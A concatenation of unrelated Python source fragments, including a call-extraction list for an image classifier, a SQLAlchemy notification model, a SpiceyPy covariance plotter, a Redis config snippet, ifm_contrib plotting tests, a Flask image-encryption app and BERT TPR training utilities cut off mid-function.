(9776, 9783), True, 'import torch.nn as nn\n'), ((9818, 9837), 'torch.nn.Linear', 'nn.Linear', (['(500)', '(102)'], {}), '(500, 102)\n', (9827, 9837), True, 'import torch.nn as nn\n'), ((9871, 9891), 'torch.nn.LogSoftmax', 'nn.LogSoftmax', ([], {'dim': '(1)'}), '(dim=1)\n', (9884, 9891), True, 'import torch.nn as nn\n'), ((13271, 13286), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (13284, 13286), False, 'import torch\n'), ((15162, 15182), 'torch.load', 'torch.load', (['filepath'], {}), '(filepath)\n', (15172, 15182), False, 'import torch\n'), ((15207, 15236), 'torchvision.models.vgg16', 'models.vgg16', ([], {'pretrained': '(True)'}), '(pretrained=True)\n', (15219, 15236), False, 'from torchvision import datasets, transforms, models\n'), ((18270, 18287), 'PIL.Image.open', 'Image.open', (['image'], {}), '(image)\n', (18280, 18287), False, 'from PIL import Image\n'), ((18581, 18612), 'numpy.array', 'np.array', (['[0.485, 0.456, 0.406]'], {}), '([0.485, 0.456, 0.406])\n', (18589, 18612), True, 'import numpy as np\n'), ((18623, 18654), 'numpy.array', 'np.array', (['[0.229, 0.224, 0.225]'], {}), '([0.229, 0.224, 0.225])\n', (18631, 18654), True, 'import numpy as np\n'), ((19478, 19509), 'numpy.array', 'np.array', (['[0.485, 0.456, 0.406]'], {}), '([0.485, 0.456, 0.406])\n', (19486, 19509), True, 'import numpy as np\n'), ((19520, 19551), 'numpy.array', 'np.array', (['[0.229, 0.224, 0.225]'], {}), '([0.229, 0.224, 0.225])\n', (19528, 19551), True, 'import numpy as np\n'), ((19686, 19706), 'numpy.clip', 'np.clip', (['image', '(0)', '(1)'], {}), '(image, 0, 1)\n', (19693, 19706), True, 'import numpy as np\n'), ((21370, 21387), 'torch.exp', 'torch.exp', (['output'], {}), '(output)\n', (21379, 21387), False, 'import torch\n'), ((3868, 3897), 'torchvision.transforms.RandomRotation', 'transforms.RandomRotation', (['(30)'], {}), '(30)\n', (3893, 3897), False, 'from torchvision import datasets, transforms, models\n'), ((3938, 3971), 'torchvision.transforms.RandomResizedCrop', 'transforms.RandomResizedCrop', (['(224)'], {}), '(224)\n', (3966, 3971), False, 'from torchvision import datasets, transforms, models\n'), ((4012, 4045), 'torchvision.transforms.RandomHorizontalFlip', 'transforms.RandomHorizontalFlip', ([], {}), '()\n', (4043, 4045), False, 'from torchvision import datasets, transforms, models\n'), ((4086, 4107), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (4105, 4107), False, 'from torchvision import datasets, transforms, models\n'), ((4148, 4214), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (4168, 4214), False, 'from torchvision import datasets, transforms, models\n'), ((4316, 4338), 'torchvision.transforms.Resize', 'transforms.Resize', (['(255)'], {}), '(255)\n', (4333, 4338), False, 'from torchvision import datasets, transforms, models\n'), ((4378, 4404), 'torchvision.transforms.CenterCrop', 'transforms.CenterCrop', (['(224)'], {}), '(224)\n', (4399, 4404), False, 'from torchvision import datasets, transforms, models\n'), ((4444, 4465), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (4463, 4465), False, 'from torchvision import datasets, transforms, models\n'), ((4505, 4571), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (4525, 4571), False, 'from torchvision import datasets, transforms, models\n'), ((4673, 4695), 'torchvision.transforms.Resize', 'transforms.Resize', (['(255)'], {}), '(255)\n', (4690, 4695), False, 'from torchvision import datasets, transforms, models\n'), ((4735, 4761), 'torchvision.transforms.CenterCrop', 'transforms.CenterCrop', (['(224)'], {}), '(224)\n', (4756, 4761), False, 'from torchvision import datasets, transforms, models\n'), ((4801, 4822), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (4820, 4822), False, 'from torchvision import datasets, transforms, models\n'), ((4862, 4928), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (4882, 4928), False, 'from torchvision import datasets, transforms, models\n'), ((13453, 13470), 'torch.exp', 'torch.exp', (['logits'], {}), '(logits)\n', (13462, 13470), False, 'import torch\n'), ((15422, 15443), 'torch.nn.Linear', 'nn.Linear', (['(25088)', '(500)'], {}), '(25088, 500)\n', (15431, 15443), True, 'import torch.nn as nn\n'), ((15478, 15487), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (15485, 15487), True, 'import torch.nn as nn\n'), ((15522, 15539), 'torch.nn.Dropout', 'nn.Dropout', ([], {'p': '(0.5)'}), '(p=0.5)\n', (15532, 15539), True, 'import torch.nn as nn\n'), ((15574, 15593), 'torch.nn.Linear', 'nn.Linear', (['(500)', '(102)'], {}), '(500, 102)\n', (15583, 15593), True, 'import torch.nn as nn\n'), ((15627, 15647), 'torch.nn.LogSoftmax', 'nn.LogSoftmax', ([], {'dim': '(1)'}), '(dim=1)\n', (15640, 15647), True, 'import torch.nn as nn\n'), ((18546, 18565), 'numpy.array', 'np.array', (['pil_image'], {}), '(pil_image)\n', (18554, 18565), True, 'import numpy as np\n'), ((19256, 19270), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (19268, 19270), True, 'import matplotlib.pyplot as plt\n'), ((21232, 21255), 'torch.from_numpy', 'torch.from_numpy', (['image'], {}), '(image)\n', (21248, 21255), False, 'import torch\n'), ((22992, 23010), 'seaborn.color_palette', 'sb.color_palette', ([], {}), '()\n', (23008, 23010), True, 'import seaborn as sb\n'), ((6302, 6328), 'os.path.basename', 'os.path.basename', (['dir_name'], {}), '(dir_name)\n', (6318, 6328), False, 'import os\n'), ((6485, 6518), 'os.path.join', 'os.path.join', (['dir_name', 'file_name'], {}), '(dir_name, file_name)\n', (6497, 6518), False, 'import os\n'), ((10653, 10668), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (10666, 10668), False, 'import torch\n'), ((11062, 11078), 'torch.exp', 'torch.exp', (['logps'], {}), '(logps)\n', (11071, 11078), False, 'import torch\n')] |
from config import db, ma
class Notification(db.Model):
__tablename__ = "notification"
__table_args__ = {"schema": "eagle_db"}
id = db.Column(db.Integer(), primary_key=True)
isActive = db.Column(db.Boolean())
lastUpdated = db.Column(db.String(20))
toUserId = db.Column(db.Integer(), db.ForeignKey("eagle_db.user.id"))
fromUserId = db.Column(db.Integer, db.ForeignKey("eagle_db.user.id"))
importance = db.Column(db.Integer())
message = db.Column(db.String(255))
isRead = db.Column(db.Boolean())
typeId = db.Column(db.Integer(), db.ForeignKey("eagle_db.notificationType.id"))
def __repr__(self):
return "<Notification(id={self.id!r})>".format(self=self)
class NotificationSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Notification
include_fk = True
load_instance = True
| [
"config.db.ForeignKey",
"config.db.String",
"config.db.Integer",
"config.db.Boolean"
] | [((162, 174), 'config.db.Integer', 'db.Integer', ([], {}), '()\n', (172, 174), False, 'from config import db, ma\n'), ((220, 232), 'config.db.Boolean', 'db.Boolean', ([], {}), '()\n', (230, 232), False, 'from config import db, ma\n'), ((263, 276), 'config.db.String', 'db.String', (['(20)'], {}), '(20)\n', (272, 276), False, 'from config import db, ma\n'), ((304, 316), 'config.db.Integer', 'db.Integer', ([], {}), '()\n', (314, 316), False, 'from config import db, ma\n'), ((318, 351), 'config.db.ForeignKey', 'db.ForeignKey', (['"""eagle_db.user.id"""'], {}), "('eagle_db.user.id')\n", (331, 351), False, 'from config import db, ma\n'), ((393, 426), 'config.db.ForeignKey', 'db.ForeignKey', (['"""eagle_db.user.id"""'], {}), "('eagle_db.user.id')\n", (406, 426), False, 'from config import db, ma\n'), ((456, 468), 'config.db.Integer', 'db.Integer', ([], {}), '()\n', (466, 468), False, 'from config import db, ma\n'), ((495, 509), 'config.db.String', 'db.String', (['(255)'], {}), '(255)\n', (504, 509), False, 'from config import db, ma\n'), ((535, 547), 'config.db.Boolean', 'db.Boolean', ([], {}), '()\n', (545, 547), False, 'from config import db, ma\n'), ((573, 585), 'config.db.Integer', 'db.Integer', ([], {}), '()\n', (583, 585), False, 'from config import db, ma\n'), ((587, 632), 'config.db.ForeignKey', 'db.ForeignKey', (['"""eagle_db.notificationType.id"""'], {}), "('eagle_db.notificationType.id')\n", (600, 632), False, 'from config import db, ma\n')] |
#!/usr/bin/env python3
from spiceypy import spiceypy as spice
from lincov.spice_loader import SpiceLoader
import pandas as pd
import numpy as np
from scipy.linalg import norm
from scipy.stats import chi2
import sys
import matplotlib
matplotlib.use('TKAgg')
import matplotlib.pyplot as plt
from matplotlib.patches import Ellipse
from mpl_toolkits.mplot3d import Axes3D, art3d
import lincov.frames as frames
from lincov.plot_utilities import *
from lincov.reader import *
from lincov import LinCov
def plot_lvlh_covariance(label, count = 0, body_id = 399, object_id = -5440, pos_vel_axes = None, snapshot_label = None):
if body_id == 'earth':
body_id = 399
elif body_id == 'moon':
body_id = 301
if pos_vel_axes is None:
pos_axes = None
vel_axes = None
else:
pos_axes, vel_axes = pos_vel_axes
P, time = LinCov.load_covariance(label, count, snapshot_label)
# Get LVLH frame
x_inrtl = spice.spkez(object_id, time, 'J2000', 'NONE', body_id)[0] * 1000.0
T_inrtl_to_lvlh = frames.compute_T_inrtl_to_lvlh( x_inrtl )
# Transform covariance to LVLH frame
P_lvlh = T_inrtl_to_lvlh.dot(P[0:6,0:6]).dot(T_inrtl_to_lvlh.T)
fig1, pos_axes = error_ellipsoid(P_lvlh[0:3,0:3], dof=3, xlabel='downtrack (m)', ylabel='crosstrack (m)', zlabel='radial (m)', label=label, axes = pos_axes)
fig2, vel_axes = error_ellipsoid(P_lvlh[3:6,3:6], dof=3, xlabel='downtrack (m/s)', ylabel='crosstrack (m/s)', zlabel='radial (m/s)', label=label, axes = vel_axes)
if label is not None:
pos_axes[0].legend()
vel_axes[0].legend()
return (fig1, fig2), (pos_axes, vel_axes)
def plot_covariance(P, **kwargs):
fig, axes = error_ellipsoid(P, dof=P.shape[0], **kwargs)
return fig, axes
if __name__ == '__main__':
if len(sys.argv) < 4:
raise SyntaxError("expected run name, index number, body name")
labels = sys.argv[1]
try:
count = int(sys.argv[2])
snapshot_label = None
except ValueError:
count = None
snapshot_label = sys.argv[2]
body = sys.argv[3]
loader = SpiceLoader('spacecraft')
axes = None
for label in labels.split(','):
figs, axes = plot_lvlh_covariance(label,
count = count,
body_id = body,
pos_vel_axes = axes,
snapshot_label = snapshot_label)
plt.show()
| [
"matplotlib.use",
"spiceypy.spiceypy.spkez",
"lincov.spice_loader.SpiceLoader",
"lincov.frames.compute_T_inrtl_to_lvlh",
"lincov.LinCov.load_covariance",
"matplotlib.pyplot.show"
] | [((237, 260), 'matplotlib.use', 'matplotlib.use', (['"""TKAgg"""'], {}), "('TKAgg')\n", (251, 260), False, 'import matplotlib\n'), ((873, 925), 'lincov.LinCov.load_covariance', 'LinCov.load_covariance', (['label', 'count', 'snapshot_label'], {}), '(label, count, snapshot_label)\n', (895, 925), False, 'from lincov import LinCov\n'), ((1059, 1098), 'lincov.frames.compute_T_inrtl_to_lvlh', 'frames.compute_T_inrtl_to_lvlh', (['x_inrtl'], {}), '(x_inrtl)\n', (1089, 1098), True, 'import lincov.frames as frames\n'), ((2143, 2168), 'lincov.spice_loader.SpiceLoader', 'SpiceLoader', (['"""spacecraft"""'], {}), "('spacecraft')\n", (2154, 2168), False, 'from lincov.spice_loader import SpiceLoader\n'), ((2552, 2562), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2560, 2562), True, 'import matplotlib.pyplot as plt\n'), ((970, 1024), 'spiceypy.spiceypy.spkez', 'spice.spkez', (['object_id', 'time', '"""J2000"""', '"""NONE"""', 'body_id'], {}), "(object_id, time, 'J2000', 'NONE', body_id)\n", (981, 1024), True, 'from spiceypy import spiceypy as spice\n')] |
import redis
redis_db = redis.StrictRedis(host="nn-sq-svc", port=6379, db=0)
print(redis_db.keys())
redis_db.set('n_samples',100000)
redis_db.set('epochs', 150)
redis_db.set('batch_size', 1000)
redis_db.set('mid_range', 10)
| [
"redis.StrictRedis"
] | [((25, 77), 'redis.StrictRedis', 'redis.StrictRedis', ([], {'host': '"""nn-sq-svc"""', 'port': '(6379)', 'db': '(0)'}), "(host='nn-sq-svc', port=6379, db=0)\n", (42, 77), False, 'import redis\n')] |
import unittest
import ifm_contrib as ifm
from ifm import Enum
import numpy as np
import geopandas as gpd
import pandas as pd
class TestPlot(unittest.TestCase):
def test_faces(self):
ifm.forceLicense("Viewer")
self.doc = ifm.loadDocument(r".\models\example_2D.dac")
self.doc.c.plot.faces()
def test_edges(self):
ifm.forceLicense("Viewer")
self.doc = ifm.loadDocument(r".\models\example_2D.dac")
self.doc.c.plot.edges()
def test_continuous(self):
ifm.forceLicense("Viewer")
self.doc = ifm.loadDocument(r".\models\example_2D.dac")
self.doc.c.plot.continuous(par=Enum.P_HEAD)
def test_patches(self):
ifm.forceLicense("Viewer")
self.doc = ifm.loadDocument(r".\models\example_2D_unconf.fem") # pure triangle mesh
self.doc.c.plot._contours(par=Enum.P_COND, style="patches")
self.doc.c.plot.patches(par=Enum.P_COND)
def test_fringes(self):
ifm.forceLicense("Viewer")
self.doc = ifm.loadDocument(r".\models\example_2D.dac")
self.doc.c.plot.fringes(par=Enum.P_HEAD, alpha=1, cmap="feflow_blue_green_red")
def test_isolines(self):
ifm.forceLicense("Viewer")
self.doc = ifm.loadDocument(r".\models\example_2D.dac")
self.doc.c.plot.isolines(par=Enum.P_HEAD, colors="black")
def test_obs_markers(self):
ifm.forceLicense("Viewer")
self.doc = ifm.loadDocument(r".\models\example_2D.dac")
self.doc.c.plot.obs_markers()
self.doc.c.plot.obs_markers(filter_by={"label": ["myObsPoint1", "myObsPoint2"]})
def test_obs_labels(self):
ifm.forceLicense("Viewer")
self.doc = ifm.loadDocument(r".\models\example_2D.dac")
self.doc.c.plot.obs_labels()
self.doc.c.plot.obs_labels(filter_by={"label": ["myObsPoint1", "myObsPoint2"]})
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"ifm_contrib.loadDocument",
"ifm_contrib.forceLicense"
] | [((1894, 1909), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1907, 1909), False, 'import unittest\n'), ((197, 223), 'ifm_contrib.forceLicense', 'ifm.forceLicense', (['"""Viewer"""'], {}), "('Viewer')\n", (213, 223), True, 'import ifm_contrib as ifm\n'), ((243, 288), 'ifm_contrib.loadDocument', 'ifm.loadDocument', (['""".\\\\models\\\\example_2D.dac"""'], {}), "('.\\\\models\\\\example_2D.dac')\n", (259, 288), True, 'import ifm_contrib as ifm\n'), ((355, 381), 'ifm_contrib.forceLicense', 'ifm.forceLicense', (['"""Viewer"""'], {}), "('Viewer')\n", (371, 381), True, 'import ifm_contrib as ifm\n'), ((401, 446), 'ifm_contrib.loadDocument', 'ifm.loadDocument', (['""".\\\\models\\\\example_2D.dac"""'], {}), "('.\\\\models\\\\example_2D.dac')\n", (417, 446), True, 'import ifm_contrib as ifm\n'), ((518, 544), 'ifm_contrib.forceLicense', 'ifm.forceLicense', (['"""Viewer"""'], {}), "('Viewer')\n", (534, 544), True, 'import ifm_contrib as ifm\n'), ((564, 609), 'ifm_contrib.loadDocument', 'ifm.loadDocument', (['""".\\\\models\\\\example_2D.dac"""'], {}), "('.\\\\models\\\\example_2D.dac')\n", (580, 609), True, 'import ifm_contrib as ifm\n'), ((698, 724), 'ifm_contrib.forceLicense', 'ifm.forceLicense', (['"""Viewer"""'], {}), "('Viewer')\n", (714, 724), True, 'import ifm_contrib as ifm\n'), ((744, 796), 'ifm_contrib.loadDocument', 'ifm.loadDocument', (['""".\\\\models\\\\example_2D_unconf.fem"""'], {}), "('.\\\\models\\\\example_2D_unconf.fem')\n", (760, 796), True, 'import ifm_contrib as ifm\n'), ((972, 998), 'ifm_contrib.forceLicense', 'ifm.forceLicense', (['"""Viewer"""'], {}), "('Viewer')\n", (988, 998), True, 'import ifm_contrib as ifm\n'), ((1018, 1063), 'ifm_contrib.loadDocument', 'ifm.loadDocument', (['""".\\\\models\\\\example_2D.dac"""'], {}), "('.\\\\models\\\\example_2D.dac')\n", (1034, 1063), True, 'import ifm_contrib as ifm\n'), ((1189, 1215), 'ifm_contrib.forceLicense', 'ifm.forceLicense', (['"""Viewer"""'], {}), "('Viewer')\n", (1205, 1215), True, 'import ifm_contrib as ifm\n'), ((1235, 1280), 'ifm_contrib.loadDocument', 'ifm.loadDocument', (['""".\\\\models\\\\example_2D.dac"""'], {}), "('.\\\\models\\\\example_2D.dac')\n", (1251, 1280), True, 'import ifm_contrib as ifm\n'), ((1387, 1413), 'ifm_contrib.forceLicense', 'ifm.forceLicense', (['"""Viewer"""'], {}), "('Viewer')\n", (1403, 1413), True, 'import ifm_contrib as ifm\n'), ((1433, 1478), 'ifm_contrib.loadDocument', 'ifm.loadDocument', (['""".\\\\models\\\\example_2D.dac"""'], {}), "('.\\\\models\\\\example_2D.dac')\n", (1449, 1478), True, 'import ifm_contrib as ifm\n'), ((1645, 1671), 'ifm_contrib.forceLicense', 'ifm.forceLicense', (['"""Viewer"""'], {}), "('Viewer')\n", (1661, 1671), True, 'import ifm_contrib as ifm\n'), ((1691, 1736), 'ifm_contrib.loadDocument', 'ifm.loadDocument', (['""".\\\\models\\\\example_2D.dac"""'], {}), "('.\\\\models\\\\example_2D.dac')\n", (1707, 1736), True, 'import ifm_contrib as ifm\n')] |
import os
import uuid
from werkzeug.utils import secure_filename
from pathlib import Path
import random
from flask import Flask, flash, request, redirect, url_for, render_template, jsonify
from flask_cors import CORS, cross_origin
import chaosencryptor.src.models
from PIL import Image
import json
DEBUG = False
dirp = Path(__file__).parents[0]
template_folder = os.path.join(dirp, 'templates')
static_folder = os.path.join(template_folder, 'static')
media_folder = os.path.join(static_folder)
media_base_url = '/static'
app = Flask(__name__, template_folder=template_folder, static_folder=static_folder)
cors = CORS(app)
# media folder should be in static
app.config['UPLOAD_FOLDER'] = media_folder
app.config['MAX_CONTENT_LENGTH'] = 16*1024*1024 # 16MB
app.config['NEXT_IMAGE_ID'] = 1
app.config['store'] = {'images': {}, 'current_upimg': None}
IMAGE_EXTENSIONS = set(['png'])
def verify_image_extension(s):
return '.' in s and s.rsplit('.',1)[1].lower() in IMAGE_EXTENSIONS
@app.route('/')
def main():
return render_template('index.html')
@app.route('/upimg', methods=['POST'])
def upimg():
result = {'uploaded': False}
form_input_name = 'file'
if form_input_name not in request.files:
result['message'] = 'No file found'
return result, 404
file = request.files[form_input_name]
if not file or not file.filename:
result['message'] = 'No filename selected'
return result, 404
if not verify_image_extension(file.filename):
result['message'] = 'File extension not allowed'
return result, 415
# Success
ext = file.filename.rsplit('.',1)[1].lower()
new_filename = f'{app.config["NEXT_IMAGE_ID"]}_{secure_filename(str(uuid.uuid4()))}.{ext}'
img_path = os.path.join(app.config['UPLOAD_FOLDER'], new_filename)
app.config['store']['images'][app.config['NEXT_IMAGE_ID']] = {
'_name': new_filename,
'url': f'{media_base_url}/{new_filename}'
}
result['message'] = 'Image uploaded'
result['id'] = app.config['NEXT_IMAGE_ID']
result['url'] = f'{media_base_url}/{new_filename}'
result['uploaded'] = True
app.config['NEXT_IMAGE_ID'] += 1
file.save(img_path)
app.config['store']['current_upimg'] = img_path
#print(app.config['store']['current_upimg'])
return result, 200
@app.route('/encrypt', methods=['GET'])
def encrypt():
model = request.args.get('model')
encrypter = getattr(chaosencryptor.src.models, model)()
im = Image.open(app.config['store']['current_upimg'])
name = im.filename
im = im.convert('RGB')
image, key = encrypter.encrypt(image=im, name=name)
img_path = f'{name.rsplit(".", 1)[0]}_encrypted{random.randint(0, 99999)}.png'
image.save(img_path)
app.config['store']['current_encryptimg'] = img_path
result = {
'message': 'Image encrypted',
'key': json.dumps(key),
'url': f'{media_base_url}/{os.path.basename(img_path)}'
}
return result, 200
@app.route('/decrypt', methods=['POST'])
def decrypt():
result = {'uploaded': False}
keystring = request.form.get('keystring')
model = request.form.get('model')
if not keystring:
result['message'] = 'No key provided'
return result, 404
# Success
# open the current uploaded image
im = Image.open(app.config['store']['current_upimg'])
name = im.filename
im = im.convert('RGB')
# load the json string
key = json.loads(keystring.replace('\\', ''))
decrypter = getattr(chaosencryptor.src.models, model)()
image = decrypter.decrypt(image=im, key=key)
img_path = f'{name.rsplit(".", 1)[0]}_decrypted{random.randint(0, 99999)}.png'
image.save(img_path)
app.config['store']['current_decryptimg'] = img_path
result = {
'message': 'Image decrypted',
'url': f'{media_base_url}/{os.path.basename(img_path)}'
}
return result, 200
if DEBUG:
@app.route('/images', methods=['GET'])
def images():
return app.config['store']['images'], 200
@app.route('/images/<int:id>', methods=['GET'])
def images_id(id):
if app.config['store']['images'].get(id):
return app.config['store']['images'][id], 200
else:
return {'message': 'Did not find image'}, 404
if __name__ == '__main__':
if DEBUG:
app.run(debug=True, use_reloader=True)
else:
app.run()
| [
"flask.render_template",
"flask.request.args.get",
"PIL.Image.open",
"flask_cors.CORS",
"flask.Flask",
"pathlib.Path",
"json.dumps",
"os.path.join",
"flask.request.form.get",
"uuid.uuid4",
"os.path.basename",
"random.randint"
] | [((364, 395), 'os.path.join', 'os.path.join', (['dirp', '"""templates"""'], {}), "(dirp, 'templates')\n", (376, 395), False, 'import os\n'), ((412, 451), 'os.path.join', 'os.path.join', (['template_folder', '"""static"""'], {}), "(template_folder, 'static')\n", (424, 451), False, 'import os\n'), ((467, 494), 'os.path.join', 'os.path.join', (['static_folder'], {}), '(static_folder)\n', (479, 494), False, 'import os\n'), ((529, 606), 'flask.Flask', 'Flask', (['__name__'], {'template_folder': 'template_folder', 'static_folder': 'static_folder'}), '(__name__, template_folder=template_folder, static_folder=static_folder)\n', (534, 606), False, 'from flask import Flask, flash, request, redirect, url_for, render_template, jsonify\n'), ((614, 623), 'flask_cors.CORS', 'CORS', (['app'], {}), '(app)\n', (618, 623), False, 'from flask_cors import CORS, cross_origin\n'), ((1025, 1054), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (1040, 1054), False, 'from flask import Flask, flash, request, redirect, url_for, render_template, jsonify\n'), ((1760, 1815), 'os.path.join', 'os.path.join', (["app.config['UPLOAD_FOLDER']", 'new_filename'], {}), "(app.config['UPLOAD_FOLDER'], new_filename)\n", (1772, 1815), False, 'import os\n'), ((2399, 2424), 'flask.request.args.get', 'request.args.get', (['"""model"""'], {}), "('model')\n", (2415, 2424), False, 'from flask import Flask, flash, request, redirect, url_for, render_template, jsonify\n'), ((2496, 2544), 'PIL.Image.open', 'Image.open', (["app.config['store']['current_upimg']"], {}), "(app.config['store']['current_upimg'])\n", (2506, 2544), False, 'from PIL import Image\n'), ((3105, 3134), 'flask.request.form.get', 'request.form.get', (['"""keystring"""'], {}), "('keystring')\n", (3121, 3134), False, 'from flask import Flask, flash, request, redirect, url_for, render_template, jsonify\n'), ((3147, 3172), 'flask.request.form.get', 'request.form.get', (['"""model"""'], {}), "('model')\n", (3163, 3172), False, 'from flask import Flask, flash, request, redirect, url_for, render_template, jsonify\n'), ((3335, 3383), 'PIL.Image.open', 'Image.open', (["app.config['store']['current_upimg']"], {}), "(app.config['store']['current_upimg'])\n", (3345, 3383), False, 'from PIL import Image\n'), ((320, 334), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (324, 334), False, 'from pathlib import Path\n'), ((2888, 2903), 'json.dumps', 'json.dumps', (['key'], {}), '(key)\n', (2898, 2903), False, 'import json\n'), ((2704, 2728), 'random.randint', 'random.randint', (['(0)', '(99999)'], {}), '(0, 99999)\n', (2718, 2728), False, 'import random\n'), ((3676, 3700), 'random.randint', 'random.randint', (['(0)', '(99999)'], {}), '(0, 99999)\n', (3690, 3700), False, 'import random\n'), ((2940, 2966), 'os.path.basename', 'os.path.basename', (['img_path'], {}), '(img_path)\n', (2956, 2966), False, 'import os\n'), ((3880, 3906), 'os.path.basename', 'os.path.basename', (['img_path'], {}), '(img_path)\n', (3896, 3906), False, 'import os\n'), ((1722, 1734), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (1732, 1734), False, 'import uuid\n')] |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import os
from modules.model import BertForSequenceClassification_tpr
from utils.data_utils import convert_examples_to_features, logger
from transformers.file_utils import PYTORCH_PRETRAINED_BERT_CACHE
from transformers.modeling_bert import BertModel
from transformers.optimization import AdamW, WarmupLinearSchedule
from torch.optim import SGD
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
from torch.utils.data.distributed import DistributedSampler
def prepare_data_loader(args, processor, label_list, task_type, task, tokenizer, split, examples=None, single_sentence=False,
return_pos_tags=False, return_ner_tags=False, return_dep_parse=False, return_const_parse=False):
data_dir = os.path.join(args.data_dir, task)
if examples is None:
if split == 'train':
examples = processor.get_train_examples(data_dir)
if split == 'dev':
examples = processor.get_dev_examples(data_dir)
if split == 'test':
examples = processor.get_test_examples(data_dir)
features, structure_features = convert_examples_to_features(examples, label_list, args.max_seq_length, tokenizer, single_sentence,
return_pos_tags, return_ner_tags, return_dep_parse, return_const_parse)
all_tokens, token_pos, token_ner, token_dep, token_const = structure_features
logger.info("***** preparing data *****")
logger.info(" Num examples = %d", len(examples))
batch_size = args.train_batch_size if split == 'train' else args.eval_batch_size
logger.info(" Batch size = %d", batch_size)
all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
all_input_mask = torch.tensor([f.input_mask for f in features], dtype=torch.uint8)
all_segment_ids = torch.tensor([f.segment_ids for f in features], dtype=torch.long)
all_sub_word_masks = torch.tensor([f.sub_word_masks for f in features], dtype=torch.uint8)
all_orig_to_token_maps = torch.tensor([f.orig_to_token_map for f in features], dtype=torch.long)
if split == 'test':
if task.lower() == 'snli':
all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long)
data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_sub_word_masks, all_orig_to_token_maps, all_label_ids)
else:
data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_sub_word_masks, all_orig_to_token_maps)
else:
if task_type != 1:
all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long)
else:
all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.float32)
data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_sub_word_masks, all_orig_to_token_maps, all_label_ids)
if split == 'train' and not args.save_tpr_attentions:
if args.local_rank == -1:
sampler = RandomSampler(data)
else:
sampler = DistributedSampler(data)
else:
sampler = SequentialSampler(data)
all_guids = [f.guid for f in features]
dataloader = DataLoader(data, sampler=sampler, batch_size=batch_size)
return dataloader, all_guids, structure_features
def prepare_optim(args, num_train_steps, param_optimizer):
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
t_total = num_train_steps
scheduler = None
if args.local_rank != -1:
t_total = t_total // torch.distributed.get_world_size()
if args.fp16:
try:
from apex.optimizers import FP16_Optimizer
from apex.optimizers import FusedAdam
except ImportError:
raise ImportError(
"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
optimizer = FusedAdam(optimizer_grouped_parameters,
lr=args.learning_rate,
bias_correction=False,
max_grad_norm=1.0)
if args.loss_scale == 0:
optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True)
else:
optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale)
else:
if args.optimizer == 'adam':
optimizer = AdamW(optimizer_grouped_parameters,
lr=args.learning_rate,
correct_bias=False)
scheduler = WarmupLinearSchedule(optimizer, warmup_steps=args.warmup_proportion * t_total, t_total=t_total)
# elif args.optimizer == 'radam':
# optimizer = RAdam(optimizer_grouped_parameters,
# lr=args.learning_rate)
elif args.optimizer == 'sgd':
optimizer = SGD(optimizer_grouped_parameters,
lr=args.learning_rate)
return optimizer, scheduler, t_total
def prepare_model(args, opt, num_labels, task_type, device, n_gpu, loading_path=None):
# Load config and pre-trained model
pre_trained_model = BertModel.from_pretrained(args.bert_model, cache_dir=PYTORCH_PRETRAINED_BERT_CACHE / 'distributed_{}'.format(args.local_rank))
bert_config = pre_trained_model.config
# modify config
bert_config.num_hidden_layers = args.num_bert_layers
model = BertForSequenceClassification_tpr(bert_config,
num_labels=num_labels,
task_type=task_type,
temperature=args.temperature,
max_seq_len=args.max_seq_length,
**opt)
# load desired layers from config
model.bert.load_state_dict(pre_trained_model.state_dict(), strict=False)
# initialize Symbol and Filler parameters from a checkpoint instead of randomly initializing them
if loading_path:
logger.info('loading model checkpoint from {}'.format(loading_path))
output_model_file = os.path.join(loading_path)
states = torch.load(output_model_file, map_location=device)
model_state_dict = states['state_dict']
# options shouldn't be loaded from the pre-trained model
# opt = states['options']
desired_keys = []
if args.load_role:
logger.info('loading roles from checkpoint model')
desired_keys.extend(['head.R.weight', 'head.R.bias'])
if args.load_filler:
logger.info('loading fillers from checkpoint model')
desired_keys.extend(['head.F.weight', 'head.F.bias'])
if args.load_role_selector:
logger.info('loading role selectors from checkpoint model')
desired_keys.extend(['head.WaR.weight', 'head.WaR.bias'])
desired_keys.extend([name for name in model_state_dict.keys() if name.startswith('head.enc_aR')])
if args.load_filler_selector:
